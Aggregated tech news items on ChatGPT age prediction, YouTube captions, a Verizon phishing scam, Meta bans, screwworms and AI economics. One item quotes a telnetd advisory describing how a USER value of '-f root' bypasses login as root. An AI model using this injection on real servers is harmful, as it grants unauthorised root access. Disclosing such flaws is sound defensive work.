OpenAI is launching age prediction for ChatGPT accounts

OpenAI is the latest company to hop on the bandwagon of gating access by users’ age. The AI business is beginning a global rollout of an age prediction tool to determine whether or not a user is a minor. “The model looks at a combination of behavioral and account-level signals, including how long an account has existed, typical times of day when someone is active, usage patterns over time,and a user’s stated age,” the company’s announcement states. If an individual is incorrectly characterized by ChatGPT as underage, they will need to submit a selfie to correct the mistake through the Persona age verification platform. 

Most AI companies have been willing to push new features first and then attempt to layer on a patchwork of protections and safety guards on top of them after they cause harm. OpenAI was implicated in a wrongful death suit for a teen who allegedly used ChatGPT to plan his suicide, and only in the following months began pondering automatic restrictions on content for underage users and launching a mental health advisory council. In this instance, OpenAI is attempting to prepare for the launch of an “adult mode” that will allow users to create and consume content that would be dubbed NSFW. Considering how well a similar change has been going over at Roblox, another platform with a shaky history around protecting minors, it seems probable that underage users will find ways to circumvent the existing tools if they want to use ChatGPT as adults.

This article originally appeared on Engadget at https://www.engadget.com/ai/openai-is-launching-age-prediction-for-chatgpt-accounts-222650340.html?src=rss

Google temporarily disabled YouTube’s advanced captions without warning

YouTubers have been increasingly frustrated with Google’s management of the platform, with disinformation welcomed back and an aggressive push for more AI (except where Google doesn’t like it). So it’s no surprise that creators have been up in arms over the suspicious removal of YouTube’s advanced SRV3 caption format. You don’t have to worry too much just yet—Google says this is only temporary, and it’s working on a fix for the underlying bug.

Google added support for this custom subtitle format around 2018, giving creators more customization options than regular users get with traditional captions. SRV3 (also known as YTT or YouTube Timed Text) allows for custom colors, transparency, animations, fonts, and precise positioning in videos. Uploaders using this format can color-code and position captions to help separate multiple speakers, create sing-along animations, or style them to match the video.

Over the last several days, creators who’ve become accustomed to this level of control have been dismayed to see that YouTube is no longer accepting videos with this Google-created format. Many worried Google had ditched the format entirely, which could be problematic for all those previously uploaded videos.

Read full article

Comments

Scammers Are Targeting Your Verizon Outage Refund

Verizon had a massive outage last week, leaving roughly two million customers unable to use their phones off of wifi or SOS mode for nearly a day. As an apology for the inconvenience, the company promised to refund those affected a meager $20 to their accounts—so naturally, scammers quickly got a phishing scheme up and running targeting people eligible for the credit. As reported by Android Authority, the Jones County Sheriff’s Office in Georgia has issued an alert about fake Verizon “credit” messages floating around.

Verizon credit phishing scam

According to the sheriff’s office, scammers may contact you via text or email—claiming to be from Verizon—with information about the outage credit. These messages contain phishing links, which may be set up to collect personal information or account credentials or deliver malware to your device. Clicking through will likely compromise your data in some way, especially if you enter any details on a malicious website.

If you are a Verizon customer who was affected by the outage, you will receive a text letting you know that your $20 credit is available to claim in the myVerizon app, which is why you may not be immediately suspicious of the scam. Plus, since you do need to claim the funds, you may be swayed by a message that sounds urgent. Don’t fall for it.

In general, you shouldn’t click links in unsolicited communication, and you should be suspicious of any messages that prompt you to click said links, even if they appear to be from a legitimate company about a legitimate matter. As evidenced by this phishing campaign and those like it, scammers can and will impersonate trusted brands and use real events to seem more believable.

Instead, always navigate directly to the app or official website—type in the URL and check it carefully or go through your password manager—and log in using your account credentials. Once logged in, you can see any legitimate communication and take action securely. Know that scammers can easily spoof websites, so if you click a phishing link, you may not realize that you’re on a fake page.

Meta’s Oversight Board Takes Up Permanent Bans In Landmark Case

An anonymous reader quotes a report from TechCrunch: Meta’s Oversight Board is tackling a case focused on Meta’s ability to permanently disable user accounts. Permanent bans are a drastic action, locking people out of their profiles, memories, friend connections, and, in the case of creators and businesses, their ability to market and communicate with fans and customers. This is the first time in the organization’s five-year history as an oversight body that permanent account bans have been a subject of the Oversight Board’s focus, the organization notes.

The case being reviewed isn’t exactly one of an everyday user. Instead, the case involves a high-profile Instagram user who repeatedly violated Meta’s Community Standards by posting visual threats of violence against a female journalist, anti-gay slurs against politicians, content depicting a sex act, allegations of misconduct against minorities, and more. The account had not accumulated enough strikes to be automatically disabled, but Meta made the decision to permanently ban the account. The Board’s materials didn’t name the account in question, but its recommendations could impact others who post content that targets public figures with abuse, harassment, and threats, as well as users who have their accounts permanently banned without receiving transparent explanations.

Meta referred this specific case to the Board, which included five posts made in the year before the account was permanently disabled. The Board says it’s looking for input about several key issues: how permanent bans can be processed fairly, the effectiveness of its current tools to protect public figures and journalists from repeated abuse and threats of violence, the challenges of identifying off-platform content, whether punitive measures effectively shape online behaviors, and best practices for transparent reporting on account enforcement decisions. […] Whether the Oversight Board has any real sway to address issues on Meta’s platform continues to be debated, of course. […] After the Oversight Board issues its policy recommendations to Meta, the company has 60 days to respond. The Board is also soliciting public comments on this topic. The report notes that Meta’s Oversight Board is able to overturn individual moderation decisions and offer recommendations, but largely sidelined from major policy shifts driven by Mark Zuckerberg.


Read more of this story at Slashdot.

Flesh-eating flies are eating their way through Mexico, CDC warns

The US Centers for Disease Control and Prevention issued a health alert to clinicians Tuesday, warning that the savage, flesh-eating parasitic fly—the New World Screwworm—is not only approaching the Texas border, but also felling an increasing number of animals in the bordering Mexican state of Tamaulipas.

The advisory, released through the agency’s Health Alert Network, directs doctors, veterinarians, and other health workers to be on the lookout for patients with wounds teeming with ferocious maggots burrowing into their living flesh. The alert also provides guidance on what to do if any such festering wounds are encountered—namely, remove each and every maggot to prevent the patient from dying, and, under no circumstance allow any of the parasites to survive and escape.

The New World Screwworm (NWS) is a fly that lays its eggs—up to 400 at a time—in the wounds, orifices, and mucus membranes of any warm-blooded animal. The eggs hatch into flesh-eating maggots, which look and act much like screws, twisting and boring into their victims while eating them alive.

Read full article

Comments

Ayaneo Konkr Fit Handheld Debuts With 7-Inch OLED And Ryzen AI 9 HX 470

Ayaneo Konkr Fit Handheld Debuts With 7-Inch OLED And Ryzen AI 9 HX 470
Ayaneo announced Konkr Pocket Fit today, marking the first Windows-based handheld model in Ayaneo’s Konkr sub-brand. While pricing and final storage and memory specifications are unknown due to the ongoing DRAM crisis and NAND shortage, this new OLED-equipped handheld seems set to compete with the OneXFly F1 Pro, but with a slightly souped-up

ChatGPT Is Getting on the AI Age Verification Bandwagon

When OpenAI first announced GPT-5.2 last month, it quietly disclosed a new safety feature it called “age prediction.” Considering ChatGPT proper isn’t exactly an “all ages” kind of tool, it makes sense that users under the age of 18 should have protections in place to shield them from harmful content. The company says that users who indicate they’re under 18 already receive an altered experience to “reduce exposure to sensitive or potentially harmful content,” but if the user doesn’t voluntarily share how old they are with OpenAI, how does the company enforce these protections? Here’s where age prediction comes in.

How age prediction for ChatGPT works

On Tuesday, OpenAI officially announced its new age prediction policy, which, like other age verification systems being used by the likes of Roblox, uses AI to guess how old a user is. If the system decides that a particular user is under the age of 18, OpenAI will adjust the experience accordingly, with the goal of keeping all interactions age-appropriate.

Here’s how it works: The new age prediction model looks at both the user’s behaviors within the app, as well as the general account data. That includes things like how old the account is, what times of day the user is accessing ChatGPT, usage patterns, as well as, of course, the age the user says they are. Looking at all this data, the model determines how old the user likely is. If the model thinks they’re over 18, they’ll get the full experience; if the model thinks they’re under 18, they’ll get the “safer experience.” If the model isn’t confident, it defaults to that safer experience.

What’s restricted in the “safer” version of ChatGPT

That limited experience means that someone the model thinks is under 18 will try to reduce the following content types:

  • Graphic violence or gore

  • Viral challenges that might inspire “risky or harmful behaviors”

  • Role play that is sexual, romantic, or violent in nature

  • Self-harm descriptions

  • Content promoting “extreme” beauty standards, unhealthy dieting, or body shaming

The company says that its approach is informed by “expert input” as well as literature discussing child development science. (It’s not clear whether how much of that input is from direct interviews and coordination with experts, and how much, if any, is from independent research.) The company also acknowledges “known teen differences in risk perception, impulse control, peer influence, and emotional regulation” when compared to adults.

AI isn’t always great at age prediction

The biggest risk with any of these age prediction models is that they’ll sometimes get it wrong—hallucination is an unfortunate habit AI models all share. That goes both ways: You don’t want someone too young accessing inappropriate content in ChatGPT, but you also don’t want someone older than 18 getting stuck with a limited account for no reason. If you experience the latter situation, OpenAI has a solution for you: direct age verification through Persona. This is the same third-party Roblox uses for its age verification, which hasn’t gone very well thus far.

That doesn’t necessarily spell doom for OpenAI. Roblox tried overhauling their age verification system for a massive user base all used to a certain type of multiplayer experience, which led to users not being able to chat with other users in newly-assigned age categories, which were often incorrect. Meanwhile, ChatGPT’s age prediction is only controlling the experience of one user at a time. To that end, OpenAI will let you upload a selfie as an added verification step if the prediction model alone isn’t enough. Interestingly, OpenAI doesn’t say anything about the option to upload an ID for verification, which other companies, like Google, have provided.

I’m not necessarily a fan of age prediction models, as I think they often sacrifice user privacy in the name of creating age-appropriate experiences. But there’s little doubt that OpenAI has to do something to limit the full ChatGPT experience for younger users. Many of ChatGPT’s users are under 18, and much of the content they experience is wildly inappropriate, whether it be instructions on getting high, or advice on writing suicide notes. In some tragic cases, minors have taken their own lives after discussions with ChatGPT, leading to lawsuits against OpenAI.

I don’t have any great answers here. We’ll just have to see how this new age prediction model affects the user experience for minors and adults alike, and whether it actually manages to create a safer experience for younger, more impressionable users.

Macaque facial gestures are more than just a reflex, study finds

Recent advances in brain-computer interfaces have made it possible to more accurately extract speech from neural signals in humans, but language is just one of the tools we use to communicate. “When my young nephew asks for ice cream before dinner and I say ‘no,’ the meaning is entirely dictated by whether the word is punctuated with a smirk or a stern frown,” says Geena Ianni, a neuroscientist at the University of Pennsylvania. That’s why in the future, she thinks, neural prostheses meant for patients with a stroke or paralysis will decode facial gestures from brain signals in the same way they decode speech.

To lay a foundation for these future facial gesture decoders, Ianni and her colleagues designed an experiment to find out how neural circuitry responsible for making faces really works. “Although in recent years neuroscience got a good handle on how the brain perceives facial expressions, we know relatively little about how they are generated,” Ianni says. And it turned out that a surprisingly large part of what neuroscientists assumed about facial gestures was wrong.

The natural way

For a long time, neuroscientists thought facial gestures in primates stemmed from a neat division of labor in the brain. “Case reports of patients with brain lesions suggested some brain regions were responsible for certain types of emotional expressions while other regions were responsible for volitional movements like speech,” Ianni explains. We’ve developed a clearer picture of speech by tracing the origin of these movements down to the level of individual neurons. But we’ve not done the same for facial expressions. To fill this gap, Ianni and her team designed a study using macaques—social primates that share most of their complex facial musculature with humans.

Read full article

Comments

56% of Companies Have Seen Zero Financial Return From AI Investments, PwC Survey Says

More than half of companies haven’t seen any financial benefit from their AI investments, according to PwC’s latest Global CEO Survey [PDF], and yet the spending shows no signs of slowing down. Some 56% of the 4,454 chief executives surveyed across 95 countries said their companies have realized neither higher revenues nor lower costs from AI over the past year.

Only 12% reported getting both benefits — and those rare winners tend to be the ones who built proper enterprise-wide foundations rather than chasing one-off projects. CEO confidence in near-term growth has taken a notable hit. Just 30% feel strongly optimistic about revenue growth over the next 12 months, down from 38% last year and nowhere near the 56% who felt that way in 2022.


Read more of this story at Slashdot.

Remote authentication bypass in telnetd

One would assume that most LWN readers stopped running network-accessible
telnet services some number of decades ago. For the rest of you, this security advisory from
Simon Josefsson
is worthy of note:

The telnetd server invokes /usr/bin/login (normally running as
root) passing the value of the USER environment variable received
from the client as the last parameter.

If the client supplies a carefully crafted USER environment value
being the string “-f root”, and passes the telnet(1) -a or –login
parameter to send this USER environment to the server, the client
will be automatically logged in as root bypassing normal
authentication processes.

Setapp Mobile To Close in February as Alternative iOS App Store Economics Prove Untenable

MacPaw, the Ukraine-based developer, has announced that Setapp Mobile — its alternative iOS app store for European Union users that launched in open beta in September 2024 — will shut down on February 16, 2026, citing “still-evolving and complex business terms” for alternative marketplaces that don’t fit its current business model.

Alternative iOS stores became possible under the Digital Markets Act but face challenges including Apple’s controversial Core Technology Fee, which Epic Games CEO Tim Sweeney has called “ruinous for any hopes of a competing store getting a foothold.”


Read more of this story at Slashdot.

Anthropic CEO Says Government Should Help Ensure AI’s Economic Upside Is Shared

An anonymous reader shares a report: Anthropic Chief Executive Dario Amodei predicted a future in which AI will spur significant economic growth — but could lead to widespread unemployment and inequality. Amodei is both “excited and worried” about the impact of AI, he said in an interview at Davos Tuesday. “I don’t think there’s an awareness at all of what is coming here and the magnitude of it.”

Anthropic is the developer of the popular chatbot Claude. Amodei said the government will need to play a role in navigating the massive displacement in jobs that could result from advances in AI. He said there could be a future with 5% to 10% GDP growth and 10% unemployment. “That’s not a combination we’ve almost ever seen before,” he said. “There’s gonna need to be some role for government in the displacement that’s this macroeconomically large.”

Amodei painted a potential “nightmare” scenario that AI could bring to society if not properly checked, laying out a future in which 10 million people — 7 million in Silicon Valley and the rest scattered elsewhere — could “decouple” from the rest of society, enjoying as much as 50% GPD growth while others were left behind. “I think this is probably a time to worry less about disincentivizing growth and worry more about making sure that everyone gets a part of that growth,” Amodei said. He noted that was “the opposite of the prevailing sentiment now,” but the reality of technological change will force those ideas to change.


Read more of this story at Slashdot.